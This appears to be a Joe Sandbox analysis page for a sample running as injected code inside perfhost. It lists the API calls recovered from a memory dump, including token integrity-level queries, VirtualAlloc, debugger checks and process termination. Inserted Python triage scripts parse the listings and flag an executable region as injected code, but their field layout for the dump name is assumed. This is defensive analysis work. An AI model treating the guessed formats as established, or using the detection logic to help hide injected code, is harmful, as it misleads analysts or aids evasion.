50684->50627 50690 6e2410 50684->50690 50693 6e29f4 50684->50693 50685->50654 50685->50687 50686 6c62e0 ReadFile SetFilePointerEx 50686->50697 50688->50649 50691 6e2ed5 50688->50691 50710 6c5c10 ReadFile SetFilePointerEx _strlen 50688->50710 50689 6e2c7b 50711 6c5c10 ReadFile SetFilePointerEx _strlen 50691->50711 50692 6e2ebb 50693->50586 50693->50627 50695->50667 50696 6e2edb 50697->50652 50697->50661 50697->50673 50697->50686 50700 6e2d08 50697->50700 50699->50653 50699->50666 50699->50692 50699->50697 50701 6e3079 50699->50701 50709 6c5c10 ReadFile SetFilePointerEx _strlen 50699->50709 50700->50666 50701->50641 50701->50667 50702->50667 50703->50617 50704->50689 50705->50680 50706->50700 50707->50625 50708->50655 50709->50699 50710->50688 50711->50696 50712->50647 50713->50688 50714->50606 50715->50677 50716->50614 50717->50624 50718->50644 50719->50669 50720->50600 50721->50574 50968 6c5c10 77 API calls 2 library calls 50969 6c9d9a SetFilePointerEx 51001 706f07 65 API calls 2 library calls 50722 6c5917 50723 6c58fc CloseHandle 50722->50723 50724 6c591a 50722->50724 50724->50723 50725 6c59ad 50724->50725
APIs
• CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,006C5563), ref: 006C8227
• GetCurrentProcess.KERNEL32(?,?,?,006C5563), ref: 006C826F
• GetTokenInformation.KERNELBASE(?,?,?,?,?,006C5563), ref: 006C8280
• GetLastError.KERNEL32(?,?,?,?,006C5563), ref: 006C828E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
• String ID: $hR'n$j@h$Ul
• API String ID: 2078281146-1656569733
• Opcode ID: 8b89a3a8f40ad4ad300554f56945303f22198982bf967490660020a50f00856d
• Instruction ID: b6a5cf6b63c349ac70e22cf796f4138ec822c67220e0462b57c62775cf7b0477
• Opcode Fuzzy Hash: 8b89a3a8f40ad4ad300554f56945303f22198982bf967490660020a50f00856d
• Instruction Fuzzy Hash: C233447190E3C19ECB318B29C818FF67BE7EB61314F4846AEE4858B3E2D6259D05C752
APIs
• GetWindowsDirectoryW.KERNEL32(?,006C5A6E), ref: 006E7925
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: DirectoryWindows
• String ID:
• API String ID: 3619848164-0
• Opcode ID: b857bb6af0aec59f08827f4f4b5b71a285ad09b3e4cd49dc1051daeeca315ca4
• Instruction ID: 24d29a9f5f7aafcae3bb6d2d91771d6c4c2ed4ce525aa26c2dc1180a60d59221
• Opcode Fuzzy Hash: b857bb6af0aec59f08827f4f4b5b71a285ad09b3e4cd49dc1051daeeca315ca4
• Instruction Fuzzy Hash: 3BB1042090F3C5AFDB364B2B4C09BFA3B675F22720F1906D6E5848B3E3E6144D09D296
APIs
• GetSidSubAuthorityCount.ADVAPI32 ref: 006C8199
• CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: AuthorityCloseCountHandle
• String ID:
• API String ID: 1604591301-0
• Opcode ID: f32c0c1ac52748b800ac365978fa36a553c48d6197c4211e88e8c41184916d0c
• Instruction ID: 3934d3afa7f33dc2c0675e3e42d921dc033447ff8d7c4b2106a2a2510ef0dd6e
• Opcode Fuzzy Hash: f32c0c1ac52748b800ac365978fa36a553c48d6197c4211e88e8c41184916d0c
• Instruction Fuzzy Hash: 3D31F770A0C201AFC9398618C80DFF63A97EA61334F0C429EF556573F1D928AE02C65A
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2eed3519d5bc789891993f952767190f79f3c48ac5f8753b017861a67dc2ec5e
• Instruction ID: a0862d9300f11436637402a9d3b821d790d900ee85790b31821bb9cf7d16073e
• Opcode Fuzzy Hash: 2eed3519d5bc789891993f952767190f79f3c48ac5f8753b017861a67dc2ec5e
• Instruction Fuzzy Hash: B0F0B430A84B86AEDE350A79D80CFF52683DBA2766F0A490CE950573E18F085F0142CD
APIs
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 006C832A
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 8d6a502ad5d507744e7c611316724abe7f5ce816719758114d1ea9d738bcd086
• Instruction ID: 588ef5fb3c1aacf1464159509bd7335a09268ab310caddba568f119d3cd28afd
• Opcode Fuzzy Hash: 8d6a502ad5d507744e7c611316724abe7f5ce816719758114d1ea9d738bcd086
• Instruction Fuzzy Hash: FEE0C238248B42BFEA3206204C09FB62F2BEBC1B41F4A044DB440932A2CD1C8E0153E8
APIs
• GetSidSubAuthorityCount.ADVAPI32 ref: 006C8199
• CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
• GetCurrentProcess.KERNEL32(?,?,?,006C5563), ref: 006C826F
• GetTokenInformation.KERNELBASE(?,?,?,?,?,006C5563), ref: 006C8280
• GetLastError.KERNEL32(?,?,?,?,006C5563), ref: 006C828E
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
• String ID:
• API String ID: 85819701-0
• Opcode ID: a4d99e587194612dc5906e417be2cfbc6ed0f72c64d8a8f15c692d4f9e7e0d01
• Instruction ID: 763a1b2a2e0d1dc9e5605de55bad35286658fb53e084ccfb3cb7a4b15544d3b3
• Opcode Fuzzy Hash: a4d99e587194612dc5906e417be2cfbc6ed0f72c64d8a8f15c692d4f9e7e0d01
• Instruction Fuzzy Hash: 47E09265E0C241CEC53206285C1CFF225A3D91232470C026FDD12837A2DD2A8D06D193
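The per-function listings above are regular enough to parse, which is what a triage script needs: pull every "• Name.MODULE(args), ref: ADDR" entry into a record, keep the constants the sandbox decoded (such as 00000019(TokenIntegrityLevel)), and tag API combinations within a block. The script below is an added example written for this page, not Joe Sandbox code, and it runs on constructed input copied from the entries above. Two assumptions are labelled in the comments: the .sdmp file name is read as <pid hex>.<run>.<id>.<base>.<protection>..., an inference from the page's own correspondence between 0000000F / 00000002 / 006C0000 and hcaresult_15_2_6c0000, and the tag labels are heuristics. GetTokenInformation with TokenIntegrityLevel followed by GetSidSubAuthorityCount is the standard Win32 sequence for reading a token's integrity RID from its mandatory-label SID; the report shows only the calls, not what the sample does with the result.

```python
"""Parse Joe Sandbox per-function API listings into records and tag API
combinations.  Added example, not Joe Sandbox code; tags are heuristics."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: entries copied from the report page, indentation removed.
SAMPLE = """\
APIs
• GetSidSubAuthorityCount.ADVAPI32 ref: 006C8199
• CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
• GetCurrentProcess.KERNEL32(?,?,?,006C5563), ref: 006C826F
• GetTokenInformation.KERNELBASE(?,?,?,?,?,006C5563), ref: 006C8280
• GetLastError.KERNEL32(?,?,?,?,006C5563), ref: 006C828E
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
APIs
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 006C832A
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
APIs
• GetWindowsDirectoryW.KERNEL32(?,006C5A6E), ref: 006E7925
"""

# "• Name.MODULE(arg,...), ref: ADDR"; the argument list is optional.
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
# One argument: 8 hex digits, optionally followed by the decoded symbolic name.
ARG_RE = re.compile(r"^([0-9A-Fa-f]{8})(?:\((\w+)\))?$")
# ASSUMED .sdmp layout: <pid hex>.<run>.<id>.<base>.<protection>... (inferred
# from the pid/run/base cross-reference with the snapshot file name).
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.")
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Block:
    apis: List[Dict] = field(default_factory=list)
    source_file: Optional[str] = None
    snapshot_file: Optional[str] = None


def split_args(s: str) -> List[str]:
    """Split on top-level commas only, so 00000019(TokenIntegrityLevel) stays whole."""
    if not s:
        return []
    out, cur, depth = [], [], 0
    for ch in s:
        if ch == "," and depth == 0:
            out.append("".join(cur))
            cur = []
            continue
        depth += (ch == "(") - (ch == ")")
        cur.append(ch)
    out.append("".join(cur))
    return out


def parse_arg(raw: str) -> Dict:
    m = ARG_RE.match(raw.strip())
    if not m:  # '?' means the sandbox could not recover the value
        return {"raw": raw.strip(), "value": None, "name": None}
    return {"raw": raw.strip(), "value": int(m.group(1), 16), "name": m.group(2)}


def parse_report(text: str) -> List[Block]:
    blocks: List[Block] = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            blocks.append(Block())
            continue
        if not blocks:
            continue
        cur = blocks[-1]
        if line.startswith("• Source File:"):
            cur.source_file = line.split("Source File:", 1)[1].split(",", 1)[0].strip()
        elif line.startswith("• Snapshot File:"):
            cur.snapshot_file = line.split("Snapshot File:", 1)[1].strip()
        elif (m := API_RE.match(line)):
            api, module, args, ref = m.groups()
            cur.apis.append({"api": api, "module": module, "ref": int(ref, 16),
                             "args": [parse_arg(a) for a in split_args(args or "")]})
    return blocks


def parse_dump_name(name: Optional[str]) -> Optional[Dict]:
    m = DUMP_RE.match(name or "")
    if not m:
        return None
    protect = int(m.group(5), 16)
    return {"pid": int(m.group(1), 16), "run": int(m.group(2), 16), "base": int(m.group(4), 16),
            "protect": protect, "protect_name": PAGE_PROTECT.get(protect, "unknown")}


def snapshot_matches_dump(block: Block) -> bool:
    """Cross-check: hcaresult_<pid>_<run>_<base>_... must agree with the .sdmp name."""
    d = parse_dump_name(block.source_file)
    return bool(d and block.snapshot_file
                and f"_{d['pid']}_{d['run']}_{d['base']:x}_" in block.snapshot_file)


# Heuristic tags: (label, APIs that must all be present, decoded argument name required)
RULES = [
    ("queries TokenIntegrityLevel", {"GetTokenInformation"}, "TokenIntegrityLevel"),
    ("reads integrity RID from token SID", {"GetTokenInformation", "GetSidSubAuthorityCount"}, None),
    ("inspects its own process token", {"GetCurrentProcess", "GetTokenInformation"}, None),
]


def tag_block(block: Block) -> List[str]:
    names = {a["api"] for a in block.apis}
    arg_names = {arg["name"] for a in block.apis for arg in a["args"] if arg["name"]}
    return [label for label, apis, arg in RULES
            if apis <= names and (arg is None or arg in arg_names)]
```

Running parse_report(SAMPLE) and tag_block over the result gives three blocks: the first tagged as reading the integrity RID and inspecting its own token, the second as querying TokenIntegrityLevel, the third untagged; parse_dump_name on the source file yields PID 15, base 0x6C0000 and protection 0x40 (PAGE_EXECUTE_READWRITE), which agrees with the snapshot file name. Because the sandbox emits overlapping function blocks from the same dump (the CloseHandle at 006C81EB appears in several entries above), dedupe on ref before counting distinct calls.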
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 5de6e1683780696333440e81d2acf19cf3796e121060eab04e37b8cb84dc3698
                                                                                                                                                                                • Instruction ID: 3a869e1aaaf8cc0818cbd3b9c605e3a2aa5f2992c10f8997ba5d829b5153317a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5de6e1683780696333440e81d2acf19cf3796e121060eab04e37b8cb84dc3698
                                                                                                                                                                                • Instruction Fuzzy Hash: 08D05B3960D6019E8931562C884CFB765C7FE50B3174C031DED2183794DD29CD12C1D7

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 41f97ef5b448f5a92899f22de7174117b65efb9b27f36a779f7b922e635e629d
• Instruction ID: cf1c46dc3bcd071eb1d344e2ad281a8614ac6affe0e763f32e77c7598796a7ba
• Opcode Fuzzy Hash: 41f97ef5b448f5a92899f22de7174117b65efb9b27f36a779f7b922e635e629d
• Instruction Fuzzy Hash: 3FD02E80909A60D6CA048A280C4BFB9218BD228300304879EF803C6299D438F8C1ABE2

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,006C4F02,00000060), ref: 006C5BD3
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9584ff31696c758b640bb7c52129532113c3a91c8a620233c1cd3d06517f9a2d
• Instruction ID: 9ab523d4e8da673e5af7e3de066a4f0732d1ca44e1b33f23165e9ce84b580832
• Opcode Fuzzy Hash: 9584ff31696c758b640bb7c52129532113c3a91c8a620233c1cd3d06517f9a2d
• Instruction Fuzzy Hash: D4C09B35785755ADED3557544C5DFB47F359740711F144144B30A951F057707C80D50D
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007009E9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007009F3
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00700A00
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: fca93310940e9b138991b2423f7a6b6d254664f640f3c1f726c9f0e429726536
• Instruction ID: 7bf48120aa6df4102c6daa5c868cd19d09ce559edb2b2c52ac197ec4b497ba32
• Opcode Fuzzy Hash: fca93310940e9b138991b2423f7a6b6d254664f640f3c1f726c9f0e429726536
• Instruction Fuzzy Hash: 6731B4B590121DDBCB21DF64DC897C9B7F8AF08310F5082DAE51CA6291EB749F858F54
APIs
• GetCurrentProcess.KERNEL32(00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000,?,007015C8,00000003), ref: 007034EE
• TerminateProcess.KERNEL32(00000000,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000,?,007015C8,00000003), ref: 007034F5
• ExitProcess.KERNEL32 ref: 00703507
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 58b6ec416f16e9955236cea1c3538a19df62412107d6bc39aa9ef0fb24ad5673
• Instruction ID: a3cccba4316571f405d5acb4aa2b126acfce8cc059b70e61d21362aa45121858
• Opcode Fuzzy Hash: 58b6ec416f16e9955236cea1c3538a19df62412107d6bc39aa9ef0fb24ad5673
• Instruction Fuzzy Hash: 6DE01A31000149EFCF016F24CC5DA583BA9EB05341B088614F9454A162CB39AA52CA84
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
• Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction Fuzzy Hash:

Control-flow Graph
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00701AD3
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702620
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702632
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702644
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702656
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 00702668
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070267A
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070268C
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 0070269E
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026B0
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026C2
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026D4
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026E6
                                                                                                                                                                                  • Part of subcall function 00702603: _free.LIBCMT ref: 007026F8
                                                                                                                                                                                • _free.LIBCMT ref: 00701AC8
                                                                                                                                                                                  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
                                                                                                                                                                                  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
                                                                                                                                                                                • _free.LIBCMT ref: 00701AEA
                                                                                                                                                                                • _free.LIBCMT ref: 00701AFF
                                                                                                                                                                                • _free.LIBCMT ref: 00701B0A
                                                                                                                                                                                • _free.LIBCMT ref: 00701B2C
                                                                                                                                                                                • _free.LIBCMT ref: 00701B3F
                                                                                                                                                                                • _free.LIBCMT ref: 00701B4D
                                                                                                                                                                                • _free.LIBCMT ref: 00701B58
                                                                                                                                                                                • _free.LIBCMT ref: 00701B90
                                                                                                                                                                                • _free.LIBCMT ref: 00701B97
                                                                                                                                                                                • _free.LIBCMT ref: 00701BB4
                                                                                                                                                                                • _free.LIBCMT ref: 00701BCC
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: e239a9b793807ac3236a94112f4cb51a7581a8b6ff01ff37a56798222b109b29
• Instruction ID: f4ea28945e3863bbf4f0f9cc59470ab172f2312298e2a8fd6d3ea900b3141762
• Opcode Fuzzy Hash: e239a9b793807ac3236a94112f4cb51a7581a8b6ff01ff37a56798222b109b29
• Instruction Fuzzy Hash: B7317E71A00604DFEB30AA39DC49B5673E9EF00350F944669E849D72D1EF79EC808765
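Every function in this listing carries the same Source File line, and that descriptor is the most security-relevant thing on the page: it says where in the perfhost process (PID 15) this code lived and with what memory attributes. The following is an added example, not part of the Joe Sandbox report or its tooling. It decodes the dump name into VirtualQuery terms and derives the triage flags a reviewer would raise. The field order (PID, stage, id, base address, protection, state, type, reserved) is an assumption inferred from the values, which line up with the winnt.h constants, not a documented Joe Sandbox format; the constructed second name in the test exists only to show the negative case.

```python
import re

# MEMORY_BASIC_INFORMATION constants from winnt.h
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED field order of the .sdmp name (inferred from the values, not documented):
#   pid.stage.uid.base.protect.state.type.reserved
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-fA-F]{8})\.(?P<stage>[0-9a-fA-F]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\."
    r"(?P<state>[0-9a-fA-F]{8})\.(?P<mtype>[0-9a-fA-F]{8})\."
    r"(?P<reserved>[0-9a-fA-F]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Split a dump file name into its numeric fields and name the constants."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError("not a recognised .sdmp name: %r" % name)
    protect = int(m["protect"], 16)
    state = int(m["state"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "pid": int(m["pid"], 16),
        "stage": int(m["stage"], 16),
        "base": int(m["base"], 16),
        "protect": protect,
        # PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE are modifier bits above 0xFF,
        # so the base protection is the low byte.
        "protect_name": PAGE_PROTECT.get(protect & 0xFF, "UNKNOWN(0x%x)" % protect),
        "state_name": MEM_STATE.get(state, "UNKNOWN(0x%x)" % state),
        "type_name": MEM_TYPE.get(mtype, "UNKNOWN(0x%x)" % mtype),
    }


def injection_indicators(rec, based_on_pe):
    """Triage flags for a dumped region; based_on_pe mirrors the report's 'based on PE' field."""
    flags = []
    executable = (rec["protect"] & 0xFF) in EXECUTABLE_PROTECT
    if executable and rec["type_name"] == "MEM_PRIVATE":
        flags.append("executable private memory (not backed by a loaded image)")
    if rec["protect_name"] == "PAGE_EXECUTE_READWRITE":
        flags.append("RWX region: writable and executable at once, typical of unpacked or injected code")
    if executable and not based_on_pe:
        flags.append("executable region with no PE header: headerless shellcode or a stripped image")
    return flags


if __name__ == "__main__":
    # The dump name quoted throughout this report section (PID 0xF = 15, perfhost).
    NAME = "0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp"
    rec = parse_sdmp_name(NAME)
    print("pid=%d base=0x%X %s %s %s" % (
        rec["pid"], rec["base"], rec["protect_name"], rec["state_name"], rec["type_name"]))
    for flag in injection_indicators(rec, based_on_pe=False):
        print(" -", flag)
```

Run against the name on this page it reports PID 15, base 0x6C0000, PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, and all three flags fire: an RWX private committed region with no PE header inside perfhost is code that was written into the process, not loaded from disk, which is why the CRT functions catalogued below (free, DecodePointer, WideCharToMultiByte, the CorExitProcess lookup) are being pulled out of a raw memory dump rather than out of a module.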

Control-flow Graph

control_flow_graph (interactive graph not preserved in text): basic blocks 700fab-7011c2; RtlDecodePointer called in block 700fc8-700fd6; subcalls to 70419d and 700b63
APIs
• RtlDecodePointer.NTDLL(00000000), ref: 00700FCE
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 31b3c9044e4a82b2d6038b9b80e40f31490b22391a62fc0a7eb9acff41e9bda7
• Instruction ID: 50a80c6691e01fc82a70e931f459afbe231f3fd3177bbe57ee1233e17aa95b80
• Opcode Fuzzy Hash: 31b3c9044e4a82b2d6038b9b80e40f31490b22391a62fc0a7eb9acff41e9bda7
• Instruction Fuzzy Hash: 4C515B7090010EEBDB14DF68E9481ECBBF1FF49304FA14395D681A72E5CB7D8AA49B14

Control-flow Graph

control_flow_graph (interactive graph not preserved in text): basic blocks 70712c-7072de; GetConsoleCP in block 70712c-707189; WideCharToMultiByte in 707215-707235; WriteFile in 70723b-707251 and 70726c-70728a; GetLastError in 7072c4-7072ca; subcalls to 70419d, 7025dd and 706ec7
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007078A1,?,00000000,?,00000000,00000000), ref: 0070716E
• __fassign.LIBCMT ref: 007071E9
• __fassign.LIBCMT ref: 00707204
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0070722A
• WriteFile.KERNEL32(?,?,00000000,007078A1,00000000,?,?,?,?,?,?,?,?,?,007078A1,?), ref: 00707249
• WriteFile.KERNEL32(?,?,00000001,007078A1,00000000,?,?,?,?,?,?,?,?,?,007078A1,?), ref: 00707282
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 2fbec39e783b4a06a99a0c673f6040d72ea02567266b888c178b8c4a62f4362b
• Instruction ID: 0ec3a970fffc001d7c77fd802f354f360b366b9c3e253118de3f710b574350e8
• Opcode Fuzzy Hash: 2fbec39e783b4a06a99a0c673f6040d72ea02567266b888c178b8c4a62f4362b
• Instruction Fuzzy Hash: DD519D71E04249EFCB14CFA8DC45AEEBBF8BF19300F14425AE955E72D2E634A941CB64

Control-flow Graph

control_flow_graph (interactive graph not preserved in text): basic blocks 7027a6-702889; block 7027b7-702884 makes repeated subcalls to 70276a and 701626 (the _free / HeapFree cleanup listed below)
APIs
  • Part of subcall function 0070276A: _free.LIBCMT ref: 00702793
• _free.LIBCMT ref: 007027F4
  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
• _free.LIBCMT ref: 007027FF
• _free.LIBCMT ref: 0070280A
• _free.LIBCMT ref: 0070285E
• _free.LIBCMT ref: 00702869
• _free.LIBCMT ref: 00702874
• _free.LIBCMT ref: 0070287F
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction ID: a98b9fdd6f1a3fe15189e2cc01fc39fb8b3f231800eb1cdab56cad6c79653c27
• Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction Fuzzy Hash: 88110A73940B04EAD630BBB0CE4FFCB77DCAF04700F845A15BA9AB60D3DA69A9058755

Control-flow Graph

